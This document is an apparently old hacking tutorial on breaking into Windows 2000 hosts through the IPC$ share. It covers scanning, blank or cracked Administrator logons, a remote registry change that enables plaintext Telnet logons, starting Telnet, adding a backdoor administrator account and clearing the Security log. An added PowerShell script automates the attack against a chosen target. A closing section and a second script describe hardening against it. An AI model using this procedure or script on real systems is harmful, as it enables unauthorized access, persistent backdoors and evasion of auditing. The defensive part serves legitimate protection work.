
hacking win2k through ipc$

What you need :


+++++++++++++++
1. A port scanner like Superscan v3.0.
2. NetBrute scanner.
3. PQWak v1.0 share name password cracker.
_____________________________________________________________________________
->1. Download SuperScan from Astalavista ( www.astalavista.com/hacking/win/superscan.exe ).
->2. Get Netbrute scanner from ( www.astalavista.com/hacking/win/nbrute10.zip ).
->3. Do the same with PQWak v1.0 ( www.astalavista.com/hacking/win/PQwak.exe ).
_____________________________________________________________________________
->Let's begin
1. Open SuperScan and select an IP range. Check "Only scan responsive pings" and
"All selected ports in list".
Then scan only NetBIOS (139) and port 1025 (listed as "Network Blackjack" in
SuperScan's port list; on Windows it is normally an RPC endpoint, not Blackjack).
When a host has both ports open, open NetBrute and scan that IP to see
whether it exposes an IPC$ share.
2. After you have found an IPC$ on the remote system, open the command prompt
and type (the two double quotes are an empty password, i.e. you are trying
the built-in Administrator account with a blank password):
C:\>net use \\ipaddress\ipc$ "" /user:administrator
When the logon succeeds, it prints:
C:\>net use \\ipaddress\ipc$ "" /user:administrator
The command completed successfully.
If it reports a bad username or password instead, run PQWak.exe to crack the
share password, then supply the password like so:
C:\>net use \\ipaddress\ipc$ "password" /user:administrator
Try the password recovered for the C$ share as the Administrator password when
connecting to IPC$.
3. Once you are connected, open Computer Management. Click "Action", then
"Connect to another computer", and type in the IP address.
4. Then go to Start > Run..., open "regedit", and use "Connect Network Registry"
to attach to the remote machine. Open the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0
and set the value "NTLM" from 2 to 1. With 2 the Telnet server accepts NTLM
authentication only, which requires an existing IPC$ session or a trusted
domain; with 1 it tries NTLM first and then falls back to a plain
username/password prompt, so you can log in to the Telnet server directly.
5. Go back to Computer Management, click "Services and Applications" and then
"Services". Right-click the Telnet service and open Properties. Set the startup
type to Automatic and start the service.
6. Go to the command prompt ( Start > Run... ) and type:
telnet <ipaddress>
When it asks for a username and password, type Administrator with no password.
You might want to create your own user account. To do so, type at the remote
command prompt (note the space before /add):
C:\>net user username password /add
To put that account into the local Administrators group, type:
C:\>net localgroup administrators username /add
("net group" only works on domain global groups on a domain controller; for the
machine-local Administrators group you need "net localgroup".)
7. The last thing is to cover your tracks.
While you are still connected, open Computer Management > Event Viewer and
check whether the Security log is being audited. If it is, clear it.
Then drop the IPC$ session from your command prompt:
C:\>net use \\ipaddress\ipc$ /delete
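Steps 2, 4, 5 and 7 above, chained into one script run from the attacking machine. This is an added example, not code from the original tutorial. It assumes that the target host name or IP is passed as -Target, that net.exe, reg.exe and sc.exe are available locally and accept a remote machine prefix (they do on XP and later; on Windows 2000 they ship with the Support Tools and Resource Kit), and that the remote Telnet service is registered as TlntSvr. The password list, function names and the helper account name are the example's own. Step 1 (scanning) and step 6 (commands typed inside the telnet session) are not automated; the script prints what to type for step 6.

```powershell
# Added example (not from the original page): IPC$ logon, Telnet NTLM fallback,
# Telnet service start, and cleanup against one Win2k host.
param(
    [Parameter(Mandatory)] [string] $Target,
    # '' first: the blank Administrator password the tutorial relies on.
    # Further entries are candidates recovered with PQWak (assumption: you add them).
    [string[]] $Passwords = @(''),
    [string] $NewUser = 'svcbackup',     # hypothetical account for step 6
    [string] $NewPass = 'P@ssw0rd123'    # hypothetical password for step 6
)

function Invoke-Native {
    # Runs a native tool with a verbatim argument string and returns its exit code.
    # Start-Process passes the string unchanged, so "" survives as an empty
    # password (plain & net.exe "" drops the empty argument in Windows PowerShell).
    param([string] $Exe, [string] $ArgLine)
    $p = Start-Process -FilePath $Exe -ArgumentList $ArgLine -Wait -PassThru -WindowStyle Hidden
    return $p.ExitCode
}

function Connect-Ipc {
    # Step 2: net use \\target\ipc$ "<password>" /user:administrator
    param([string] $Target, [string] $Password)
    $line = 'use \\' + $Target + '\ipc$ "' + $Password + '" /user:administrator'
    return (Invoke-Native 'net.exe' $line) -eq 0
}

$connected = $false
foreach ($pw in $Passwords) {
    if (Connect-Ipc -Target $Target -Password $pw) {
        Write-Host "IPC`$ session to $Target as administrator (password '$pw')"
        $connected = $true
        break
    }
}
if (-not $connected) {
    Write-Error "No IPC`$ session to $Target: crack the share password with PQWak and add it to -Passwords"
    exit 1
}

# Step 4: NTLM=1 lets the Telnet server fall back to a plaintext logon prompt
# (2 = NTLM only). reg.exe accepts \\machine\HKLM\... for remote registries.
$telnetKey = '\\' + $Target + '\HKLM\SOFTWARE\Microsoft\TelnetServer\1.0'
$rc = Invoke-Native 'reg.exe' ('add "' + $telnetKey + '" /v NTLM /t REG_DWORD /d 1 /f')
if ($rc -ne 0) { Write-Warning "reg add failed (rc=$rc): Telnet server may not be installed on $Target" }

# Step 5: set the Telnet service (TlntSvr) to Automatic and start it.
# sc.exe requires the space after 'start='.
Invoke-Native 'sc.exe' ('\\' + $Target + ' config TlntSvr start= auto') | Out-Null
$rc = Invoke-Native 'sc.exe' ('\\' + $Target + ' start TlntSvr')
if ($rc -ne 0) { Write-Warning "sc start TlntSvr returned $rc (already running is 1056)" }

# Step 6 is typed inside the telnet session on the target, not here.
Write-Host "Now run:  telnet $Target   (Administrator, blank password) and type:"
Write-Host "  net user $NewUser $NewPass /add"
Write-Host "  net localgroup administrators $NewUser /add"

# Step 7: drop the IPC$ session (clear the Security log via Event Viewer first).
Invoke-Native 'net.exe' ('use \\' + $Target + '\ipc$ /delete') | Out-Null
```

Return code 1056 from sc.exe is ERROR_SERVICE_ALREADY_RUNNING and is harmless here; any other non-zero code usually means the Telnet server is not installed on the target, in which case step 4's reg add will also have failed.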
A solution to protect your W2k system from this attack is to open the following
registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
and change the value "RestrictAnonymous" from 0 to 1.
Doing this stops anonymous (null-session) IPC$ connections from enumerating
shares and user accounts. Windows 2000 also accepts the value 2, which refuses
anonymous access altogether; it is stronger but can break domain trusts and
some services, so test it first.
Note that step 2 above is not really a null session: it is a logon as
Administrator with a blank password, and RestrictAnonymous does not stop that.
Give the Administrator account a strong password, and do not leave the Telnet
service running with NTLM set below 2.
You can also install a firewall ( www.zonealarm.com ) and block TCP 139 and 445
from untrusted networks.
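An audit-and-fix script for the hardening just described, run in an elevated PowerShell on the Windows host being checked. This is an added example, not from the original page. The registry paths and the TlntSvr service name are the real ones; the -Fix switch and the function names are the example's own, and $svc.StartType assumes PowerShell 5 or later.

```powershell
# Added example (not from the original page): check RestrictAnonymous, the
# Telnet server's NTLM setting and the Telnet service, and optionally fix them.
param([switch] $Fix)

$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$TelnetKey = 'HKLM:\SOFTWARE\Microsoft\TelnetServer\1.0'

function Get-RegDword {
    # Returns $null when the key or value is absent instead of throwing.
    param([string] $Path, [string] $Name)
    try { return (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { return $null }
}

function Test-NullSessionHardening {
    $findings = @()

    $ra = Get-RegDword $LsaKey 'RestrictAnonymous'
    if ($null -eq $ra -or $ra -eq 0) {
        $findings += 'RestrictAnonymous is 0 or unset: anonymous IPC$ sessions can enumerate shares and users'
    }

    # NTLM: 0 = plaintext only, 1 = NTLM then plaintext fallback, 2 = NTLM only.
    $ntlm = Get-RegDword $TelnetKey 'NTLM'
    if ($null -ne $ntlm -and $ntlm -ne 2) {
        $findings += "Telnet NTLM=$ntlm : plaintext telnet logons are accepted (step 4 of the attack)"
    }

    $svc = Get-Service -Name TlntSvr -ErrorAction SilentlyContinue
    if ($svc -and ($svc.Status -eq 'Running' -or $svc.StartType -eq 'Automatic')) {
        $findings += "Telnet service is $($svc.Status), start type $($svc.StartType)"
    }

    # A blank Administrator password cannot be read from the registry; the
    # RestrictAnonymous value does nothing against that logon, so remind the operator.
    $findings += 'Reminder: verify the local Administrator account has a strong password'
    return $findings
}

function Set-NullSessionHardening {
    # 1 blocks anonymous enumeration. Win2k also accepts 2 (no anonymous access
    # at all), which is stronger but can break trusts and some services.
    Set-ItemProperty -Path $LsaKey -Name RestrictAnonymous -Value 1 -Type DWord

    if (Test-Path $TelnetKey) {
        Set-ItemProperty -Path $TelnetKey -Name NTLM -Value 2 -Type DWord
    }

    $svc = Get-Service -Name TlntSvr -ErrorAction SilentlyContinue
    if ($svc) {
        Stop-Service -Name TlntSvr -Force -ErrorAction SilentlyContinue
        Set-Service -Name TlntSvr -StartupType Disabled
    }
}

Write-Host '--- findings ---'
Test-NullSessionHardening
if ($Fix) {
    Set-NullSessionHardening
    Write-Host '--- after fix ---'
    Test-NullSessionHardening
}
```

Run it without -Fix first to see what it would change; with -Fix it sets RestrictAnonymous to 1 (not 2, for the compatibility reason noted in the comment), forces the Telnet server back to NTLM-only, and stops and disables the service. The Administrator password reminder is deliberately always printed, because it is the one control that actually defeats step 2.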
